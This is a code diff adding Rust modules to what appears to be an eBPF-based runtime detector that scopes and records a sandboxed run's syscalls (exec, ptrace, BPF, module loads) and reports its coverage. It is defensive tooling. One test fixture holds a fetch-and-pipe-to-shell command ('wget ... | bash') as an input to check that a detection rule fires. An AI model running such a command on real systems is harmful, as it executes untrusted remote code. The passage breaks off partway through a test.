+            "exec.interpreter-pipe" => {
+                let mut e = ev(EventKind::Exec, 10);
+                e.path = "/bin/bash".into();
+                e.aux = "-c".into();
+                e.aux2 = "wget -qO- http://x | bash".into();
+                run(vec![e])
+            }
+            "exec.package-manager" => {
+                let mut e = ev(EventKind::Exec, 10);
+                e.path = "/usr/bin/cargo".into();
+                run(vec![e])
+            }
+            "priv.ptrace" => {
+                let mut p = ev(EventKind::Ptrace, 10);
+                p.a0 = 16;
+                p.a1 = 9999;
+                run(vec![p])
+            }
+            "priv.namespace" => run(vec![ev(EventKind::Nsop, 10)]),
+            "kernel.bpf" => run(vec![ev(EventKind::Bpf, 10)]),
+            "kernel.module" => run(vec![ev(EventKind::Module, 10)]),
+            "mount.change" => run(vec![ev(EventKind::Mount, 10)]),
+            _ => Vec::new(),
+        };
+        fired(&d, id)
+    }
+
+    #[test]
+    fn rule_ids_are_unique_and_family_prefixed() {
+        let mut seen = HashSet::new();
+        for r in RULES {
+            assert!(seen.insert(r.id), "duplicate rule id {}", r.id);
+            assert!(
+                r.id.starts_with(&format!("{}.", r.family)),
+                "{} is not prefixed by its family {}",
+                r.id,
+                r.family
+            );
+            assert!(!r.title.is_empty() && !r.detail.is_empty(), "{}", r.id);
+        }
+    }
+
+    /// The Rust constants and the C header describe one wire format. If they
+    /// drift, everything above this line is reasoning about the wrong bytes.
+    #[test]
+    fn the_rust_constants_match_the_c_header() {
+        let header = include_str!("../bpf/h5i_event.h");
+        let define = |name: &str| -> Option<i64> {
+            header.lines().find_map(|l| {
+                let rest = l.strip_prefix(&format!("#define {name} "))?;
+                let tok = rest.split_whitespace().next()?;
+                let tok = tok.trim_end_matches('u');
+                if let Some(hex) = tok.strip_prefix("0x") {
+                    i64::from_str_radix(hex, 16).ok()
+                } else {
+                    tok.parse::<i64>().ok()
+                }
+            })
+        };
+        assert_eq!(define("H5I_EVENT_MAGIC"), Some(EVENT_MAGIC as i64));
+        assert_eq!(define("H5I_EVENT_VERSION"), Some(EVENT_VERSION as i64));
+        assert_eq!(define("H5I_PATH_LEN"), Some(PATH_LEN as i64));
+        assert_eq!(define("H5I_AUX_LEN"), Some(AUX_LEN as i64));
+        assert_eq!(define("H5I_AUX_HALF"), Some(AUX_HALF as i64));
+        assert_eq!(define("H5I_MAX_PREFIX"), Some(crate::event::MAX_PREFIX as i64));
+        assert_eq!(define("H5I_PREFIX_LEN"), Some(crate::event::PREFIX_LEN as i64));
+        assert_eq!(define("H5I_COMM_LEN"), Some(crate::event::COMM_LEN as i64));
+        assert_eq!(std::mem::size_of::<RawEvent>(), 520);
+
+        // Every kind's wire value, read out of the header rather than trusted.
+        for k in EventKind::ALL {
+            let name = format!("H5I_KIND_{}", k.as_str().to_uppercase());
+            assert_eq!(
+                define(&name),
+                Some(k.to_wire() as i64),
+                "{name} disagrees with the Rust enum"
+            );
+        }
+    }
+}

--- a/crates/h5i-bpf/src/scope.rs
+++ b/crates/h5i-bpf/src/scope.rs
@@ -1,0 +1,205 @@
+//! Which of the host's events belong to this box.
+//!
+//! This is the hard half of a per-run detector. Too permissive and the user's
+//! own editor is reported as box activity; too restrictive and the interesting
+//! child — the `postinstall` that lived for forty milliseconds — is the one
+//! that is missed.
+//!
+//! ## Why there is one mechanism and not three
+//!
+//! The design considered cgroup-id and pid-namespace filters as well, and both
+//! fail the same test: **the scope has to be decided before the payload
+//! exists.** A scope programmed after the child is spawned has already missed
+//! the exec that named it, which is the single most valuable event of the run.
+//! A cgroup id is knowable in advance only if h5i creates the cgroup in
+//! advance, and it does not (`sandbox::make_run_cgroup` runs inside the spawn
+//! path, and on most hosts cgroup delegation is unavailable anyway — see
+//! `cgroup.rs`). A pid-namespace inode is knowable only from
+//! `/proc/<pid>/ns/pid` of a process that does not exist yet.
+//!
+//! What *is* knowable in advance is h5i's own process tree, and the kernel can
+//! maintain the descendant set from there. That is the Tetragon idea
+//! (ROADMAP.md D3): lineage kept in the kernel rather than reconstructed by
+//! racing `/proc`, because by the time userspace reads `/proc/<pid>` the
+//! short-lived child is gone.
+//!
+//! The probe's state machine (`bpf/h5i_event.h`) closes the two holes that
+//! seeding from h5i's own tree would otherwise leave: h5i's *threads* are
+//! distinguished from its *children* by whether the new task leads its own
+//! thread group, and h5i's own `pre_exec` work — applying Landlock, opening
+//! the ruleset paths — is held back until the payload's `execve`, so h5i's
+//! confinement machinery is never reported as the box's behaviour.
+
+use serde::{Deserialize, Serialize};
+
+pub use crate::evidence::Coverage;
+
+/// The isolation tier a run is using, as far as coverage is concerned.
+///
+/// Mirrors `h5i_sandbox::IsolationClaim` without depending on it: this crate
+/// sits beside the sandbox rather than above it, and a string would let the
+/// two drift silently. [`Tier::parse`] is the seam.
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
+#[serde(rename_all = "lowercase")]
+pub enum Tier {
+    Workspace,
+    Process,
+    Supervised,
+    Container,
+    Microvm,
+    /// A tier this build does not know. Treated as uncovered, because
+    /// guessing in the permissive direction is the one mistake that produces
+    /// a false clean bill of health.
+    Unknown,
+}
+
+impl Tier {
+    pub fn parse(s: &str) -> Self {
+        match s {
+            "workspace" => Self::Workspace,
+            "process" => Self::Process,
+            "supervised" => Self::Supervised,
+            "container" => Self::Container,
+            "microvm" => Self::Microvm,
+            _ => Self::Unknown,
+        }
+    }
+
+    pub fn as_str(self) -> &'static str {
+        match self {
+            Self::Workspace => "workspace",
+            Self::Process => "process",
+            Self::Supervised => "supervised",
+            Self::Container => "container",
+            Self::Microvm => "microvm",
+            Self::Unknown => "unknown",
+        }
+    }
+
+    /// How much of a run on this tier the pid-tree scope can see, and why not
+    /// more. The reason travels into the receipt: `partial` with no
+    /// explanation is barely better than a missing block.
+    pub fn coverage(self) -> (Coverage, Option<&'static str>) {
+        match self {
+            // The payload is a direct descendant of h5i, so the tree holds it
+            // and everything it spawns.
+            Self::Workspace | Self::Process | Self::Supervised => (Coverage::Full, None),
+            // Podman's `conmon` double-forks and reparents, so the workload
+            // leaves h5i's process tree. What remains visible is the
+            // runtime's own activity on the host, which is worth having and
+            // is not the box.
+            Self::Container => (
+                Coverage::Partial,
+                Some(
+                    "the container runtime double-forks, so the workload leaves h5i's process \
+                     tree; what this lane saw is the runtime's own activity on the host, not \
+                     the box's",
+                ),
+            ),
+            // A host probe cannot see guest syscalls at all. Reporting
+            // anything else here would be the worst available failure.
+            Self::Microvm => (
+                Coverage::None,
+                Some(
+                    "the workload runs against a guest kernel, which a host probe cannot \
+                     observe at all",
+                ),
+            ),
+            Self::Unknown => (
+                Coverage::None,
+                Some("this build does not know how the box's processes relate to h5i's"),
+            ),
+        }
+    }
+}
+
+/// The one scope mechanism this build implements. Named in the receipt so a
+/// later privileged collector — which attaches out of band and can therefore
+/// resolve a cgroup or a namespace — can add mechanisms without any reader
+/// having to guess which one produced an old record.
+pub const SCOPE_PIDTREE: &str = "pidtree";
+
+/// Every task of the current process, which is what the pid tree is seeded
+/// with.
+///
+/// All of them, not just the main thread: `std::process::Command` can be
+/// called from any thread, and a tree seeded with only the main thread would
+/// miss a payload spawned from a worker. Threads created *after* seeding are
+/// picked up by the fork tracepoint and classified by the probe's state
+/// machine, so this only has to cover the ones that already exist.
+#[cfg(target_os = "linux")]
+pub fn self_tids() -> Vec<u32> {
+    let mut out = Vec::new();
+    if let Ok(dir) = std::fs::read_dir("/proc/self/task") {
+        for entry in dir.flatten() {
+            if let Some(tid) = entry.file_name().to_str().and_then(|s| s.parse::<u32>().ok()) {
+                out.push(tid);
+            }
+        }
+    }
+    if out.is_empty() {
+        // A /proc that could not be read is not a reason to watch nothing:
+        // the main thread is the one the payload is most likely spawned from.
+        out.push(std::process::id());
+    }
+    out.sort_unstable();
+    out
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn tiers_round_trip() {
+        for t in [
+            Tier::Workspace,
+            Tier::Process,
+            Tier::Supervised,
+            Tier::Container,
+            Tier::Microvm,
+        ] {
+            assert_eq!(Tier::parse(t.as_str()), t);
+        }
+    }
+
+    /// An unknown tier must be uncovered. Guessing "probably full" is the one
+    /// error that turns an absence of evidence into a clean bill of health.
+    #[test]
+    fn an_unknown_tier_is_uncovered_not_assumed_full() {
+        assert_eq!(Tier::parse("something-new"), Tier::Unknown);
+        let (cov, why) = Tier::Unknown.coverage();
+        assert_eq!(cov, Coverage::None);
+        assert!(why.is_some());
+    }
+
+    #[test]
+    fn the_kernel_tiers_are_fully_covered_and_the_guest_tier_is_not() {
+        for t in [Tier::Workspace, Tier::Process, Tier::Supervised] {
+            assert_eq!(t.coverage().0, Coverage::Full, "{}", t.as_str());
+            assert!(t.coverage().1.is_none());
+        }
+        assert_eq!(Tier::Container.coverage().0, Coverage::Partial);
+        assert_eq!(Tier::Microvm.coverage().0, Coverage::None);
+    }
+
+    /// Anything less than full coverage has to say why, or the receipt reads
+    /// as "we looked and found nothing" when it means "we could not look".
+    #[test]
+    fn every_incomplete_coverage_carries_a_reason() {
+        for t in [Tier::Container, Tier::Microvm, Tier::Unknown] {
+            let (cov, why) = t.coverage();
+            assert_ne!(cov, Coverage::Full);
+            assert!(why.is_some(), "{} has no reason", t.as_str());
+        }
+    }
+
+    #[cfg(target_os = "linux")]
+    #[test]
+    fn the_seed_includes_this_thread() {
+        let tids = self_tids();
+        assert!(!tids.is_empty());
+        // The process id is the main thread's tid, and it is always a task.
+        assert!(tids.contains(&std::process::id()));
+    }
+}

--- a/crates/h5i-bpf/src/session.rs
+++ b/crates/h5i-bpf/src/session.rs
@@ -1,0 +1,705 @@
+//! Loading the probe, attaching it, and reading what comes back.
+//!
+//! Linux only, and only with the `load` feature: everything above this module
+//! — the event model, the rules, the receipt types — compiles and is tested on
+//! every target h5i releases for, and this is the one file that needs a
+//! kernel.
+//!
+//! The lifetime of a [`Session`] is the lifetime of one run. It is started
+//! before the payload is spawned (so the payload's own `execve` is the first
+//! thing it sees) and stopped when the run returns. Nothing survives it: the
+//! programs are detached when the [`aya::Ebpf`] is dropped, the maps go with
+//! them, and there is no daemon and no pinning anywhere in this file
+//! (ROADMAP.md D12).
+
+use std::os::fd::AsRawFd;
+use std::sync::Arc;
+use std::sync::atomic::{AtomicBool, Ordering};
+use std::thread::JoinHandle;
+
+use aya::maps::{Array, HashMap as BpfHashMap, MapData, PerCpuArray, RingBuf};
+use aya::programs::TracePoint;
+use aya::{Ebpf, EbpfLoader};
+
+use crate::event::{self, Event, EventKind, MAX_PREFIX, PREFIX_LEN};
+use crate::evidence::{Coverage, LANE, RuntimeEvidence};
+use crate::rules::Engine;
+use crate::scope::{self, SCOPE_PIDTREE, Tier};
+use crate::{DetectConfig, MAX_BUFFER_KB, MIN_BUFFER_KB};
+
+/// The probe object, compiled by `build.rs` from `bpf/h5i_detect.bpf.c`.
+///
+/// `include_bytes!` of a build-script output rather than a file read at run
+/// time: the object and the loader are one artifact, and a binary that could
+/// be pointed at a different probe object would be a binary whose evidence
+/// lane can be replaced by anyone who can write a file.
+#[cfg(h5i_bpf_object)]
+const PROBE_OBJECT: &[u8] = include_bytes!(env!("H5I_BPF_OBJECT"));
+
+/// `struct h5i_config` in `bpf/h5i_event.h`.
+#[repr(C)]
+#[derive(Clone, Copy)]
+struct ConfigWire {
+    kind_mask: u64,
+    prefix_count: u32,
+    open_all: u32,
+    want_dotenv: u32,
+    _pad: u32,
+}
+unsafe impl aya::Pod for ConfigWire {}
+const _: () = assert!(std::mem::size_of::<ConfigWire>() == 24);
+
+/// `struct h5i_prefix` in `bpf/h5i_event.h`.
+#[repr(C)]
+#[derive(Clone, Copy)]
+struct PrefixWire {
+    len: u32,
+    s: [u8; PREFIX_LEN],
+}
+unsafe impl aya::Pod for PrefixWire {}
+const _: () = assert!(std::mem::size_of::<PrefixWire>() == 68);
+
+/// Every program in the object, with the tracepoint it attaches to.
+///
+/// The table is the single place the two names live. A program in the object
+/// with no row here would silently never attach, so [`Session::start`] fails
+/// if the object holds a `tracepoint/` program this table does not mention.
+const PROGRAMS: &[(&str, &str, &str)] = &[
+    ("h5i_sys_enter_execve", "syscalls", "sys_enter_execve"),
+    ("h5i_sys_enter_execveat", "syscalls", "sys_enter_execveat"),
+    ("h5i_sys_enter_openat", "syscalls", "sys_enter_openat"),
+    ("h5i_sys_enter_openat2", "syscalls", "sys_enter_openat2"),
+    ("h5i_sys_enter_connect", "syscalls", "sys_enter_connect"),
+    ("h5i_sys_enter_socket", "syscalls", "sys_enter_socket"),
+    ("h5i_sys_enter_ptrace", "syscalls", "sys_enter_ptrace"),
+    ("h5i_sys_enter_bpf", "syscalls", "sys_enter_bpf"),
+    ("h5i_sys_enter_unshare", "syscalls", "sys_enter_unshare"),
+    ("h5i_sys_enter_setns", "syscalls", "sys_enter_setns"),
+    ("h5i_sys_enter_init_module", "syscalls", "sys_enter_init_module"),
+    ("h5i_sys_enter_finit_module", "syscalls", "sys_enter_finit_module"),
+    ("h5i_sys_enter_memfd_create", "syscalls", "sys_enter_memfd_create"),
+    ("h5i_sys_enter_mount", "syscalls", "sys_enter_mount"),
+    ("h5i_sys_enter_pivot_root", "syscalls", "sys_enter_pivot_root"),
+    ("h5i_sched_process_fork", "sched", "sched_process_fork"),
+    ("h5i_sched_process_exit", "sched", "sched_process_exit"),
+];
+
+/// Tracepoints whose *scheduler* field offsets the probe hardcodes, and what
+/// it believes they are. Checked against the kernel's own `format` file when
+/// tracefs is readable (ROADMAP.md D5).
+type FieldLayout = (&'static str, usize, usize);
+
+const SCHED_FIELDS: &[(&str, &[FieldLayout])] = &[
+    (
+        "sched_process_fork",
+        &[("parent_pid", 24, 4), ("child_pid", 44, 4)],
+    ),
+    ("sched_process_exit", &[("pid", 24, 4)]),
+];
+
+/// How long the reader thread waits on the ring-buffer fd before checking
+/// whether the run has ended. Short enough that stopping is prompt, long
+/// enough that an idle run costs nothing.
+const POLL_MS: libc::c_int = 100;
+
+/// A live collector, for the length of one run.
+pub struct Session {
+    /// Holds the loaded programs. Dropping it detaches every one of them,
+    /// which is how a session leaves nothing behind.
+    ebpf: Ebpf,
+    reader: Option<JoinHandle<Collected>>,
+    stop: Arc<AtomicBool>,
+    tier: Tier,
+}
+
+/// What the reader thread hands back when the run ends.
+struct Collected {
+    engine: Engine,
+    /// Ring-buffer records the decoder refused, and the first reason.
+    ///
+    /// A nonzero count is a probe/loader mismatch — a bug in h5i, not
+    /// behaviour of the box — and it goes into the receipt rather than into a
+    /// log nobody reads, because a run whose evidence was silently thinner
+    /// than it should have been is precisely the thing this lane exists to
+    /// stop happening.
+    rejected: u64,
+    first_rejection: Option<String>,
+}
+
+impl Session {
+    /// Load, program the scope, and attach. Returns the refusal as a string on
+    /// any failure — the caller turns that into an `unavailable` block, so a
+    /// failure to start is recorded rather than logged and forgotten.
+    pub fn start(cfg: &DetectConfig) -> Result<Self, String> {
+        #[cfg(not(h5i_bpf_object))]
+        {
+            let _ = cfg;
+            Err("this build carries no eBPF probe object".to_string())
+        }
+        #[cfg(h5i_bpf_object)]
+        {
+            Self::start_inner(cfg)
+        }
+    }
+
+    #[cfg(h5i_bpf_object)]
+    fn start_inner(cfg: &DetectConfig) -> Result<Self, String> {
+        raise_memlock();
+
+        let buffer_bytes = cfg
+            .buffer_kb
+            .clamp(MIN_BUFFER_KB, MAX_BUFFER_KB)
+            .next_power_of_two()
+            .saturating_mul(1024);
+
+        let mut ebpf = EbpfLoader::new()
+            .map_max_entries("H5I_EVENTS", buffer_bytes)
+            .load(PROBE_OBJECT)
+            .map_err(|e| format!("loading the probe failed: {e}"))?;
+
+        verify_tracepoint_layout()?;
+        check_every_program_is_attached(&ebpf)?;
+        program_maps(&mut ebpf, cfg)?;
+        attach_all(&mut ebpf)?;
+
+        // Taken last, after everything that can fail: the ring buffer is what
+        // the reader thread owns, and a thread started before a failing attach
+        // would have to be torn down again.
+        let ring = ebpf
+            .take_map("H5I_EVENTS")
+            .ok_or_else(|| "the probe object has no H5I_EVENTS map".to_string())?;
+        let ring: RingBuf<MapData> =
+            RingBuf::try_from(ring).map_err(|e| format!("H5I_EVENTS is not a ring buffer: {e}"))?;
+
+        let stop = Arc::new(AtomicBool::new(false));
+        let engine = Engine::new(cfg.context.clone());
+        let reader = spawn_reader(ring, engine, Arc::clone(&stop));
+
+        Ok(Session {
+            ebpf,
+            reader: Some(reader),
+            stop,
+            tier: cfg.tier,
+        })
+    }
+
+    /// Stop collecting and produce the block for the receipt.
+    ///
+    /// Never fails. A reader thread that cannot be joined, a stats map that
+    /// cannot be read, a panic in the fold: each degrades one field of the
+    /// answer, and every one of them is reported in the block rather than
+    /// turned into an error that loses the whole run's evidence.
+    pub fn finish(mut self) -> RuntimeEvidence {
+        self.stop.store(true, Ordering::SeqCst);
+
+        let (detections, seen, mut notes) = match self.reader.take().map(|h| h.join()) {
+            Some(Ok(c)) => {
+                let seen = c.engine.events_seen();
+                let mut notes = Vec::new();
+                if c.rejected > 0 {
+                    notes.push(format!(
+                        "{} ring-buffer record{} could not be decoded ({}) — this is a \
+                         probe/loader mismatch in h5i, not box behaviour",
+                        c.rejected,
+                        if c.rejected == 1 { "" } else { "s" },
+                        c.first_rejection.as_deref().unwrap_or("no reason recorded")
+                    ));
+                }
+                (c.engine.finish(), seen, notes)
+            }
+            Some(Err(_)) => (
+                Vec::new(),
+                0,
+                vec!["the collector thread panicked; no detections from this run".to_string()],
+            ),
+            None => (Vec::new(), 0, Vec::new()),
+        };
+
+        let (lost, filtered) = self.read_stats();
+        let (coverage, tier_reason) = self.tier.coverage();
+
+        let mut reason = tier_reason.map(|s| s.to_string());
+        for extra in notes.drain(..) {
+            reason = Some(match reason {
+                Some(r) => format!("{r}; {extra}"),
+                None => extra,
+            });
+        }
+
+        RuntimeEvidence {
+            lane: LANE.to_string(),
+            scope: SCOPE_PIDTREE.to_string(),
+            coverage,
+            coverage_reason: reason,
+            events_seen: seen,
+            events_lost: lost,
+            events_filtered: filtered,
+            detections,
+            unavailable: None,
+        }
+    }
+
+    /// `(lost, filtered)`, summed across CPUs. Zero when the map cannot be
+    /// read, which is indistinguishable from "nothing was lost" and is the one
+    /// place this file has to accept that; the map is created by the same load
+    /// that created everything else, so its absence would mean a much louder
+    /// failure has already happened.
+    fn read_stats(&self) -> (u64, u64) {
+        let Some(map) = self.ebpf.map("H5I_STATS") else {
+            return (0, 0);
+        };
+        let Ok(stats) = PerCpuArray::<_, u64>::try_from(map) else {
+            return (0, 0);
+        };
+        let sum = |slot: u32| -> u64 {
+            stats
+                .get(&slot, 0)
+                .map(|per_cpu| per_cpu.iter().copied().sum())
+                .unwrap_or(0)
+        };
+        (sum(event::STAT_LOST), sum(event::STAT_FILTERED))
+    }
+}
+
+impl Drop for Session {
+    /// A session that is dropped without `finish` must still stop its thread,
+    /// or a run that failed part way through leaves a thread polling a ring
+    /// buffer whose maps are about to be unmapped.
+    fn drop(&mut self) {
+        self.stop.store(true, Ordering::SeqCst);
+        if let Some(h) = self.reader.take() {
+            let _ = h.join();
+        }
+    }
+}
+
+/// Read events until asked to stop, then drain what is left.
+///
+/// The rules run **on this thread**, folded in as each event arrives, rather
+/// than being shipped over a channel to be folded later. That removes a whole
+/// category of loss — a full channel — and there is nothing to gain from the
+/// extra hop: the fold is a few comparisons per event and the alternative is a
+/// second place for events to disappear without being counted.
+fn spawn_reader(
+    mut ring: RingBuf<MapData>,
+    engine: Engine,
+    stop: Arc<AtomicBool>,
+) -> JoinHandle<Collected> {
+    std::thread::spawn(move || {
+        let fd = ring.as_raw_fd();
+        let mut out = Collected {
+            engine,
+            rejected: 0,
+            first_rejection: None,
+        };
+        while !stop.load(Ordering::SeqCst) {
+            drain(&mut ring, &mut out);
+            wait_readable(fd, POLL_MS);
+        }
+        // The run has ended, but the kernel may have submitted records between
+        // the last drain and the stop. Losing those would mean the last thing
+        // a box did — often the interesting thing — is the one event that
+        // never reaches the receipt.
+        drain(&mut ring, &mut out);
+        out
+    })
+}
+
+fn drain(ring: &mut RingBuf<MapData>, out: &mut Collected) {
+    while let Some(item) = ring.next() {
+        match Event::decode(&item) {
+            Ok(mut ev) => {
+                // The probe cannot report a parent (ROADMAP.md D5); the fold
+                // has been watching forks and can.
+                if ev.kind != EventKind::Fork
+                    && let Some(p) = out.engine.parent_of(ev.tid)
+                {
+                    ev.ppid = p;
+                }
+                out.engine.observe(&ev);
+            }
+            // A record we cannot parse is a probe/loader mismatch, which the
+            // magic and version checks exist to make loud. Counted and
+            // reported rather than skipped in silence.
+            Err(e) => {
+                out.rejected += 1;
+                if out.first_rejection.is_none() {
+                    out.first_rejection = Some(e.to_string());
+                }
+            }
+        }
+    }
+}
+
+/// `poll(2)` the ring-buffer fd. A timeout is not an error: it is how the loop
+/// gets to check whether the run has ended.
+fn wait_readable(fd: std::os::fd::RawFd, timeout_ms: libc::c_int) {
+    let mut pfd = libc::pollfd {
+        fd,
+        events: libc::POLLIN,
+        revents: 0,
+    };
+    // SAFETY: `pfd` is a valid, initialised pollfd for the duration of the
+    // call, and the count matches the single element.
+    unsafe {
+        libc::poll(&mut pfd, 1, timeout_ms);
+    }
+}
+
+/// Kernels before 5.11 charge BPF maps against `RLIMIT_MEMLOCK`, whose default
+/// is 64 KiB — smaller than the ring buffer. Best effort: on 5.11 and later
+/// the limit is irrelevant, and where it is not, failing to raise it produces
+/// a clear "load failed" a few lines below rather than a mystery here.
+fn raise_memlock() {
+    let lim = libc::rlimit {
+        rlim_cur: libc::RLIM_INFINITY,
+        rlim_max: libc::RLIM_INFINITY,
+    };
+    // SAFETY: a well-formed rlimit for a resource this process may raise when
+    // it has the capability, and which fails harmlessly when it does not.
+    unsafe {
+        libc::setrlimit(libc::RLIMIT_MEMLOCK, &lim);
+    }
+}
+
+/// Fail if the object holds a tracepoint program [`PROGRAMS`] does not name.
+///
+/// The failure this prevents is quiet: a program added to the probe and not to
+/// the table loads, never attaches, and produces exactly the same receipt as a
+/// box that did not do the thing it was watching for.
+fn check_every_program_is_attached(ebpf: &Ebpf) -> Result<(), String> {
+    let missing: Vec<String> = ebpf
+        .programs()
+        .map(|(name, _)| name.to_string())
+        .filter(|name| !PROGRAMS.iter().any(|(p, _, _)| p == name))
+        .collect();
+    if missing.is_empty() {
+        Ok(())
+    } else {
+        Err(format!(
+            "the probe object has programs the loader does not attach: {}",
+            missing.join(", ")
+        ))
+    }
+}
+
+fn program_maps(ebpf: &mut Ebpf, cfg: &DetectConfig) -> Result<(), String> {
+    // The kind mask: every kind this build knows. Kinds are not individually
+    // selectable from a profile on purpose — a rule needs the events it needs,
+    // and letting a profile disable an event kind would let it disable a rule
+    // without saying so.
+    let kind_mask = EventKind::ALL
+        .iter()
+        .fold(0u64, |m, k| m | (1u64 << k.to_wire()));
+
+    let prefixes: Vec<&String> = cfg.prefixes.iter().take(MAX_PREFIX).collect();
+
+    {
+        let map = ebpf
+            .map_mut("H5I_CONFIG")
+            .ok_or_else(|| "the probe object has no H5I_CONFIG map".to_string())?;
+        let mut conf: Array<_, ConfigWire> =
+            Array::try_from(map).map_err(|e| format!("H5I_CONFIG is not an array: {e}"))?;
+        conf.set(
+            0,
+            ConfigWire {
+                kind_mask,
+                prefix_count: u32::try_from(prefixes.len()).unwrap_or(0),
+                open_all: u32::from(cfg.open_all),
+                want_dotenv: u32::from(cfg.want_dotenv()),
+                _pad: 0,
+            },
+            0,
+        )
+        .map_err(|e| format!("writing H5I_CONFIG failed: {e}"))?;
+    }
+
+    {
+        let map = ebpf
+            .map_mut("H5I_PREFIXES")
+            .ok_or_else(|| "the probe object has no H5I_PREFIXES map".to_string())?;
+        let mut arr: Array<_, PrefixWire> =
+            Array::try_from(map).map_err(|e| format!("H5I_PREFIXES is not an array: {e}"))?;
+        for (i, p) in prefixes.iter().enumerate() {
+            let bytes = p.as_bytes();
+            // A prefix too long to hold is dropped rather than truncated: a
+            // truncated prefix matches more than it was meant to, which turns
+            // a filter into a flood.
+            if bytes.is_empty() || bytes.len() > PREFIX_LEN {
+                continue;
+            }
+            let mut w = PrefixWire {
+                len: bytes.len() as u32,
+                s: [0u8; PREFIX_LEN],
+            };
+            w.s[..bytes.len()].copy_from_slice(bytes);
+            arr.set(i as u32, w, 0)
+                .map_err(|e| format!("writing H5I_PREFIXES[{i}] failed: {e}"))?;
+        }
+    }
+
+    {
+        let map = ebpf
+            .map_mut("H5I_TRACKED")
+            .ok_or_else(|| "the probe object has no H5I_TRACKED map".to_string())?;
+        let mut tracked: BpfHashMap<_, u32, u8> =
+            BpfHashMap::try_from(map).map_err(|e| format!("H5I_TRACKED is not a hash: {e}"))?;
+        // `0` is H5I_ST_SELF: these are h5i's own threads, so nothing they do
+        // is emitted — but anything they fork is a candidate.
+        for tid in scope::self_tids() {
+            tracked
+                .insert(tid, 0u8, 0)
+                .map_err(|e| format!("seeding the process tree failed: {e}"))?;
+        }
+    }
+
+    Ok(())
+}
+
+fn attach_all(ebpf: &mut Ebpf) -> Result<(), String> {
+    for (prog, category, name) in PROGRAMS {
+        let program = ebpf
+            .program_mut(prog)
+            .ok_or_else(|| format!("the probe object has no program {prog}"))?;
+        let tp: &mut TracePoint = program
+            .try_into()
+            .map_err(|e| format!("{prog} is not a tracepoint program: {e}"))?;
+        tp.load()
+            .map_err(|e| format!("the verifier rejected {prog}: {e}"))?;
+        tp.attach(category, name)
+            .map_err(|e| format!("attaching {prog} to {category}:{name} failed: {e}"))?;
+    }
+    Ok(())
+}
+
+/// Hold the kernel to the field offsets the probe assumes.
+///
+/// The syscall-entry layout is fixed ABI and the scheduler tracepoints publish
+/// theirs, so this is a check rather than a discovery. It is **best effort in
+/// one direction only**: tracefs is usually root-only, and an unreadable
+/// `format` file leaves the assumption unverified and the load proceeding — but
+/// a `format` file that is readable and disagrees is a hard refusal, because
+/// silently reading the wrong four bytes of a fork event is how a scope quietly
+/// stops tracking anything.
+fn verify_tracepoint_layout() -> Result<(), String> {
+    for (name, fields) in SCHED_FIELDS {
+        let Some(text) = read_format("sched", name) else {
+            continue;
+        };
+        for (field, offset, size) in *fields {
+            match parse_field(&text, field) {
+                Some((o, s)) if o == *offset && s == *size => {}
+                Some((o, s)) => {
+                    return Err(format!(
+                        "this kernel's sched:{name} has {field} at offset {o} size {s}; the probe \
+                         reads offset {offset} size {size}. Refusing to attach rather than \
+                         misread it."
+                    ));
+                }
+                None => {
+                    return Err(format!(
+                        "this kernel's sched:{name} has no {field} field; the probe cannot be \
+                         trusted against it"
+                    ));
+                }
+            }
+        }
+    }
+
+    // The syscall-entry contexts share one layout, so one of them is a
+    // sufficient check for all of them.
+    if let Some(text) = read_format("syscalls", "sys_enter_openat") {
+        match parse_field(&text, "__syscall_nr") {
+            Some((8, 4)) => {}
+            Some((o, s)) => {
+                return Err(format!(
+                    "this kernel's syscall-entry tracepoint has __syscall_nr at offset {o} size \
+                     {s}; the probe reads offset 8. Refusing to attach."
+                ));
+            }
+            None => {}
+        }
+        match parse_field(&text, "filename") {
+            // `filename` is the second syscall argument of `openat`, so it
+            // sits one register past the first, which starts at 16.
+            Some((24, 8)) | None => {}
+            Some((o, s)) => {
+                return Err(format!(
+                    "this kernel's syscalls:sys_enter_openat has filename at offset {o} size {s}; \
+                     the probe reads the argument array from offset 16. Refusing to attach."
+                ));
+            }
+        }
+    }
+    Ok(())
+}
+
+fn read_format(category: &str, name: &str) -> Option<String> {
+    for base in ["/sys/kernel/tracing", "/sys/kernel/debug/tracing"] {
+        let path = format!("{base}/events/{category}/{name}/format");
+        if let Ok(text) = std::fs::read_to_string(&path) {
+            return Some(text);
+        }
+    }
+    None
+}
+
+/// Pull `(offset, size)` for one field out of a tracepoint `format` file.
+///
+/// Lines look like this, with tabs between the parts:
+///
+/// ```text
+/// field:const char * filename;  offset:24;  size:8;  signed:0;
+/// ```
+fn parse_field(text: &str, field: &str) -> Option<(usize, usize)> {
+    for line in text.lines() {
+        let line = line.trim();
+        let Some(rest) = line.strip_prefix("field:") else {
+            continue;
+        };
+        let (decl, tail) = rest.split_once(';')?;
+        // The name is the last identifier in the declaration, minus any array
+        // suffix: `char parent_comm[16]` names `parent_comm`.
+        let name = decl
+            .trim()
+            .rsplit(|c: char| c.is_whitespace() || c == '*')
+            .next()?
+            .split('[')
+            .next()?;
+        if name != field {
+            continue;
+        }
+        let value = |key: &str| -> Option<usize> {
+            tail.split(';').find_map(|part| {
+                part.trim()
+                    .strip_prefix(key)?
+                    .trim()
+                    .parse::<usize>()
+                    .ok()
+            })
+        };
+        return Some((value("offset:")?, value("size:")?));
+    }
+    None
+}
+
+/// The block for a run whose collector never started. Kept here so the wording
+/// lives beside the code that produces the successful one.
+pub(crate) fn refused(tier: Tier, why: String) -> RuntimeEvidence {
+    let mut ev = RuntimeEvidence::unavailable(why);
+    // Coverage stays `None` — nothing was observed — but the tier's own reason
+    // is still worth carrying: on the microVM tier the honest answer is that
+    // no capability would have helped.
+    if let (Coverage::None, Some(reason)) = tier.coverage() {
+        ev.coverage_reason = Some(reason.to_string());
+    }
+    ev
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    /// The real `format` shape, from a live kernel.
+    const OPENAT_FORMAT: &str = "name: sys_enter_openat\nID: 634\nformat:\n\
+        \tfield:unsigned short common_type;\toffset:0;\tsize:2;\tsigned:0;\n\
+        \tfield:unsigned char common_flags;\toffset:2;\tsize:1;\tsigned:0;\n\
+        \tfield:unsigned char common_preempt_count;\toffset:3;\tsize:1;\tsigned:0;\n\
+        \tfield:int common_pid;\toffset:4;\tsize:4;\tsigned:1;\n\
+        \n\
+        \tfield:int __syscall_nr;\toffset:8;\tsize:4;\tsigned:1;\n\
+        \tfield:int dfd;\toffset:16;\tsize:8;\tsigned:0;\n\
